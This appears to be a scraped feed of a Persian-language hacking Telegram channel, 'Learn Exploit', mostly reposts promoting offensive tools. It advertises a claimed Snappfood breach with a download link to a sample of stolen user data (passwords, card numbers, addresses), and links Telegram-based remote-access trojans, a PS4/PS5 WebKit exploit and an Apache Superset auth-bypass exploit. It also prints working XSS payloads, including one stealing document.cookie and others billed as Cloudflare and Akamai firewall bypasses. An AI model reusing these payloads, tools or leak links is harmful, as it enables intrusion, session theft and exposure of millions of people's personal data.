⭕️🚨🚨#فوری
🔻وزارت کشور ایران توسط تیم 3ackd0or هک شد.
🔻وقتی که کد رهگیری برگشتی را مجددا به سامانه میدهند، با تصاویر کارت ملی و اطلاعات هویتی 25 کاندید مشابه با فرد درخواست شده مواجه میشوند و به این شکل 24 در 7 به دنبال هویت واقعی شما از روی چهرههایتان هستند.
Twiter
#News #moi #Hack
➖➖➖➖➖➖➖➖
@LearnExploit
@Tech_Army
🔻وزارت کشور ایران توسط تیم 3ackd0or هک شد.
🔻وقتی که کد رهگیری برگشتی را مجددا به سامانه میدهند، با تصاویر کارت ملی و اطلاعات هویتی 25 کاندید مشابه با فرد درخواست شده مواجه میشوند و به این شکل 24 در 7 به دنبال هویت واقعی شما از روی چهرههایتان هستند.
Twiter
#News #moi #Hack
➖➖➖➖➖➖➖➖
@LearnExploit
@Tech_Army
❤4👎1😁1
Jailbreak for all arm64 iOS 16.0 to iOS 16.5 devices
Github
#IOS
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#IOS
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
Release Def1nit3lyN0tAJa1lbr3akTool 0.999.3 · KpwnZ/Def1nit3lyN0tAJa1lbr3akTool
Changelog
Dynamic kernel patchfinder.
Dynamic dyld patchfinder.
Stop jailbreaking if it can not resolve offsets.
Known issues:
Sideloading would break something, please build with Xcode or use T...
Dynamic kernel patchfinder.
Dynamic dyld patchfinder.
Stop jailbreaking if it can not resolve offsets.
Known issues:
Sideloading would break something, please build with Xcode or use T...
❤🔥4❤1👍1👎1
TelegramRAT - Cross Platform Telegram based RAT that communicates via telegram
Github
#rat #windows #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#rat #windows #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤3⚡2
WebKit Exploit for PS4 6.x-9.6 / PS5 1.x-5.x
Github
#Exploit #PS4 #PS5
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Exploit #PS4 #PS5
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - kmeps4/PSFree: PSFree WebKit Exploit & Lapse Kernel Exploit For PS4 9.00 [WIP] By abc
PSFree WebKit Exploit & Lapse Kernel Exploit For PS4 9.00 [WIP] By abc - kmeps4/PSFree
❤🔥4
TelegramRat - Python RAT for Windows that uses Telegram
Github
#rat #windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#rat #windows
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6❤1
vless://7c87e6f5-5f67-4cff-a478-276e43a54b83@s.thisisforu.sbs:43978?type=tcp&security=none#GR_SV5_MCI_MTN-Learn_Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥1👍1
Cloudflare XSS Bypass Payload ⚡️
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6❤🔥3👍2
Marijuana Exploit 🍀
⬇️ Download
🔒
#Exploit #Bot
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/BugCod3
@LearnExploit
#Exploit #Bot
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🆒3👎2👍1
👍5❤1
Akamai GHost Bypass
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2👍2🆒1
Payload XSS on login page:
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
');\\</script><script>alert(document.cookie)</script>('%00tst@tst.com.br
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4⚡1🆒1
Blue Team Tools - A collection of scripts, tools. and configs for various OS'es and applications
Github
#pentesting #Blue_Team
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#pentesting #Blue_Team
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - WGU-CCDC/Blue-Team-Tools: A collection of scripts, tools. and configs for various OS'es and applications, all free and…
A collection of scripts, tools. and configs for various OS'es and applications, all free and or open-source, to assist in impromptu Blue-Team defense under an active threat. - WGU-CCDC/Blue...
اسنپفود هک شد!
به طور خلاصه موارد زیر در اختیار فروشنده قرار داره :
- اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ...
- اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره تلفن و ...
- اطلاعات بیش از ۱۸۰ میلیون دستگاه همراه شامل: نوع و مدل دستگاه، پلتفرم، توکن، فروشگاه نصب برنامه و ...
- اطلاعات بیش از ۳۶۰ میلیون سفارش شامل: آیپی سفارش دهنده، آدرس دریافتی، تلفن دریافتی، شهر، مدت زمان دریافت، نام و نام خانوادگی، مشخصات فروشگاه یا رستوران، قیمت، محصول و ...
- اطلاعات بیش از ۳۵ هزار پیک شامل: نام، نام خانوادگی، شماره تماس، کد ملی، شهر و ...
- اطلاعات بیش از ۶۰۰ هزار پرداخت سفارش شامل: نام کامل صاحب کارت، نام کامل مشتری، شماره تماس، شماره کارت، نام بانک و ...
- اطلاعات بیش از ۱۶۰ میلیون سفر انجام شده توسط پیک شامل: نام کامل مبدا و مقصد، آدرس مبدا و مقصد، تلفن مبدا و مقصد، موقعیت جغرافیایی مبدا و مقصد، تاریخ و ...
- اطلاعات بیش از ۲۴۰ هزار Vendor شامل: نام کامل، آدرس، تلفن، ایمیل، موقعیت مکانی GPS، نام مدیریت مجموعه و ...
- اطلاعات بیش از ۸۸۰ میلیون سفارش محصول
سمپل:
https://mega.nz/file/0OdnDI7Q#tqpjOn6Xrg8tJhgkNh0W1szRZWe4adlHjrVPgf6UhPM
#leak #news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
به طور خلاصه موارد زیر در اختیار فروشنده قرار داره :
- اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ...
- اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره تلفن و ...
- اطلاعات بیش از ۱۸۰ میلیون دستگاه همراه شامل: نوع و مدل دستگاه، پلتفرم، توکن، فروشگاه نصب برنامه و ...
- اطلاعات بیش از ۳۶۰ میلیون سفارش شامل: آیپی سفارش دهنده، آدرس دریافتی، تلفن دریافتی، شهر، مدت زمان دریافت، نام و نام خانوادگی، مشخصات فروشگاه یا رستوران، قیمت، محصول و ...
- اطلاعات بیش از ۳۵ هزار پیک شامل: نام، نام خانوادگی، شماره تماس، کد ملی، شهر و ...
- اطلاعات بیش از ۶۰۰ هزار پرداخت سفارش شامل: نام کامل صاحب کارت، نام کامل مشتری، شماره تماس، شماره کارت، نام بانک و ...
- اطلاعات بیش از ۱۶۰ میلیون سفر انجام شده توسط پیک شامل: نام کامل مبدا و مقصد، آدرس مبدا و مقصد، تلفن مبدا و مقصد، موقعیت جغرافیایی مبدا و مقصد، تاریخ و ...
- اطلاعات بیش از ۲۴۰ هزار Vendor شامل: نام کامل، آدرس، تلفن، ایمیل، موقعیت مکانی GPS، نام مدیریت مجموعه و ...
- اطلاعات بیش از ۸۸۰ میلیون سفارش محصول
سمپل:
#leak #news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
mega.nz
File on MEGA
❤🔥7👎3❤2🤯2😁1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-27524 ( Apache Superset Auth Bypass ) Exploit #CVE #Exploit #POC —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-27524 - Apache Superset Auth Bypass and RCE
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥2
سایته تارگت سینگل یا دابل کوتیشن رو وقتی دارید تسته xss میگیرید بلاک میکنه ؟ از پیلود زیر استفاده کنید ⚡️
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
</script><svg/onload=alert(0)>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍2❤1⚡1
0Day.Today | Learn Exploit | Zero World | Dark web |
اسنپفود هک شد! به طور خلاصه موارد زیر در اختیار فروشنده قرار داره : - اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ... - اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره…
😁19
❗️❔چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند.
💬گزینه هارو همراه با ذکر علت بفرمایید.
🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه.
توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال
گزینه ی ۱و۲ به دلیل ...
1- cursor.execute("SELECT id FROM users WHERE username = '" + username + "'");
2- cursor.execute("SELECT id FROM users WHERE username = '%s'" % username);
3- cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username));
4- cursor.execute(f"SELECT id FROM users WHERE username = '{username}'");
5- cursor.execute("SELECT id FROM users WHERE username = '%s'", (username, ));
6- cursor.execute("SELECT id FROM users WHERE username = %(username)s", {'username': username});
👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 2023
┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 2024
iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥13❤5🔥1